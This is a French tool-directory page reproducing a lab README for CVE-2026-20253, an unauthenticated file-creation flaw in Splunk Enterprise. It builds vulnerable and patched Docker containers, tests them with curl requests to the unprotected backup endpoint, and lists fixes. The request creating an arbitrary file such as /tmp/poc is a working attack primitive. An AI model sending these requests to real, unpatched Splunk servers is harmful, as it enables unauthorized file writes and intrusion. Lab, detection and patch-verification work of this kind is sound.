Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-20253 — POC pour CVE-2026-20253 | Kitploit
Outils/GitHubGitHub/pssec-io/cve-2026-20253
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubpssec-io/cve-2026-20253

CVE-2026-20253

POC pour CVE-2026-20253

Voir le dépôt
1il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-20253 — Laboratoire RCE sans authentification préalable pour Splunk Enterprise

Création et troncature arbitraires de fichiers sans authentification via le sidecar PostgreSQL
CVSS 9.8 · Critique · CWE-306 · Exploité activement (CISA KEV)


⚠️ Avertissement

Ce dépôt est destiné strictement à des fins éducatives et de recherche en sécurité autorisée.
Tout test doit être effectué sur une infrastructure que vous possédez ou pour laquelle vous avez une autorisation écrite explicite.
Les auteurs déclinent toute responsabilité en cas d’utilisation abusive des techniques ou des outils présentés ici.
N’exécutez jamais ces tests contre des systèmes de production ou des environnements qui ne vous appartiennent pas.


Présentation

CVE-2026-20253 affecte Splunk Enterprise dans les versions inférieures à 10.2.4 et 10.0.7.
Le service sidecar PostgreSQL intégré à Splunk expose deux points d’accès HTTP internes :

root@kitploit:~
/v1/postgres/recovery/backup
/v1/postgres/recovery/restore

Ces deux points d’accès ne comportent aucune vérification d’authentification (CWE-306), ce qui signifie que tout attaquant joignable sur le réseau peut les invoquer sans identifiants. En fournissant un paramètre backupFile contrôlé par l’attaquant, un utilisateur non authentifié peut créer ou tronquer des fichiers arbitraires sur le système de fichiers de l’hôte Splunk — une primitive que les chercheurs ont exploitée pour obtenir une exécution de code à distance complète sans authentification préalable.

Télécharger l’outil
PropriétéDétail
CVECVE-2026-20253
Score CVSS9.8 (Critique)
CWECWE-306 — Absence d’authentification pour une fonction critique
AffectéSplunk Enterprise 10.0.x < 10.0.7, 10.2.x < 10.2.4
Corrigé dans10.0.7, 10.2.4
CISA KEVAjouté le 18 juin 2026

Structure du dépôt

root@kitploit:~
.
├── Dockerfile                  # Image vulnérable (splunk 10.2.3)
├── docker-compose.yml          # Conteneur vulnérable sur le port 8000
├── patched.Dockerfile          # Image corrigée (splunk 10.2.4)
├── patched-docker-compose.yml  # Conteneur corrigé sur le port 8001
└── instructions                # Référence rapide des commandes

Prérequis

  • Docker + Docker Compose v2
  • ~6 Go d’espace disque libre (l’image Splunk est volumineuse)
  • Kali Linux ou tout hôte Linux avec curl disponible

Utilisation

Lancement de l’instance vulnérable (port 8000)

root@kitploit:~
docker compose -f docker-compose.yml up -d --build

Attendez environ 90 secondes que Splunk soit complètement initialisé. Suivez la progression avec :

root@kitploit:~
docker compose -f docker-compose.yml logs -f
# Prêt lorsque vous voyez : "Ansible playbook complete"

Interface web Splunk → http://localhost:8000
Identifiants : admin / changeme


Lancement de l’instance corrigée (port 8001)

root@kitploit:~
docker compose -f patched-docker-compose.yml up -d --build

Interface web Splunk → http://localhost:8001
Identifiants : admin / changeme

Les deux conteneurs peuvent fonctionner côte à côte — les ports sont décalés pour éviter les conflits.


Tests

Test de l’instance vulnérable → réponse HTTP 400 attendue

root@kitploit:~
curl -sk -X POST   "http://localhost:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

Attendu : 400 — le point d’accès existe, aucune authentification n’a été imposée, la requête a été traitée.

Vérifiez que le fichier a été créé dans le conteneur :

root@kitploit:~
docker exec splunk-cve-2026-20253 ls -la /tmp/poc

Test de l’instance corrigée → réponse HTTP 401 attendue

root@kitploit:~
curl -sk -X POST   "http://localhost:8001/en-US/splunkd/__raw/v1/postgres/recovery/backup"   -H "Authorization: Basic cHNzZWM6Cg=="   -d '{"database":"postgres","backupFile":"/tmp/poc"}'   -o /dev/null -w "HTTP Status: %{http_code}\n"

Attendu : 401 — l’authentification est maintenant imposée, la requête est rejetée.


Référence des codes de réponse

Statut HTTPSignification
400Vulnérable — point d’accès atteint, pas de vérification d’authentification
401Corrigé — authentification imposée
404Sidecar absent / mauvais chemin
000Conteneur pas encore prêt

Optionnel : scanner watchTowr

L’équipe de watchTowr Labs a publié un script de détection qui automatise le test ci-dessus :

root@kitploit:~
git clone https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
cd watchTowr-vs-Splunk-CVE-2026-20253
pip3 install requests
python3 watchTowr-vs-Splunk-CVE-2026-20253.py --host 127.0.0.1 --port 8000

Arrêt du laboratoire

root@kitploit:~
# Arrêter l’instance vulnérable
docker compose -f docker-compose.yml down

# Arrêter l’instance corrigée
docker compose -f patched-docker-compose.yml down

Correction

Mettez à jour immédiatement vers une version corrigée :

BrancheVersion corrigée
10.2.x10.2.4
10.0.x10.0.7

Si vous ne pouvez pas appliquer le correctif immédiatement, désactivez le sidecar PostgreSQL en ajoutant ce qui suit dans server.conf et redémarrez Splunk :

root@kitploit:~
[postgres]
disabled = true

⚠️ Ne désactivez pas le sidecar si vous utilisez Edge Processor ou les pipelines de données SPL2 — il est nécessaire pour ces fonctionnalités.


Références

  • 🔴 Avis officiel de Splunk — SVD-2026-0603
  • 🔬 Recherche de watchTowr Labs et outil de détection — github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • 📋 Entrée CISA KEV — cisa.gov/known-exploited-vulnerabilities-catalog
  • 📰 Article de The Hacker News — Critical Splunk Enterprise Flaw Lets Attackers Run Code Without Authentication

Mentions légales

Cet environnement de laboratoire est fourni uniquement à des fins défensives de recherche en sécurité et d’éducation.
L’accès non autorisé à des systèmes informatiques est illégal en vertu du Computer Fraud and Abuse Act (CFAA), du UK Computer Misuse Act et des législations équivalentes dans le monde entier.
Utilisez-le de manière responsable.